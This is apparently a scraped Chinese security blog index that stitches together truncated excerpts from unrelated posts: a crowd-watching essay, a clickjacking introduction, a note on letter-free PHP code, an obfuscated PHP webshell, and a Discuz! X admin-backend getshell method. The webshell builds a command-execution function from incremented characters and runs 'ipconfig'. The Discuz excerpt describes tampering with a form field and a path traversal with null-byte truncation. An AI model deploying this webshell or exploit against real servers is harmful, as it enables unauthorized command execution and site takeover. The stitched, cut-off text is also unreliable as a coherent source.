论“围观”

昨天西安某路发生一起因小事件引起的打架冲突,现场一百多人围观…… 驻足观察了片刻,现场真是热闹非凡,有吵的面红耳赤、声音嘶哑、眼睛淤肿、衣着不

Clickjacking简单介绍

0x00 相关背景介绍 Clickjacking(点击劫持)是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼在2008年首创的。 是一种视觉欺骗手段,在

Tweetable PHP-Non Alpha

Tweetable PHP-Non Alpha Thursday, 13 December 2012 I started to try and break the 10 charset limit of PHP non-alpha after @InsertScript showed me that PHP Dev supports [] syntax for arrays. I wondered if it would be possible to break the limit within production PHP. At first I thought you could but then after some testing I found that there was no way to concat without “.”

一个另类的 PHP 加密算法

这种php的数据表示方法是国外几个大牛提出来的。 Tweetable PHP-Non Alpha 蛋疼了研究了下,写出了个微型shell <?php $_[]++;$_[]=$_._;$_=$_[$_[+_]];$_=$__=$___=$____=$_____=$______=$_[+_]; $_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++; $____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++; $_____++;$_____++;$_____++;$_____++; $______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++; $_=$_.$__.$___.$____.$_____.$______;$_("ipconfig"); ?> 简单说明下 $_[]++; $_[]=$_._; $_=$_[$_[+_]]; $_=$_[+_]; //使用数

dz x 后台拿shell

用户 - 用户栏目 - 栏目分组 抓包 Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]" 改为 Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]" 访问 /home.php?mod=spacecp&id=../../robots.txt%0057 虽然涉及0x00截断 但无视 GPC source zafe 发表于 2013-5-24 10:22 ********************************************************************* 说下具体怎么利用 原帖测试的是dz x3,我测试的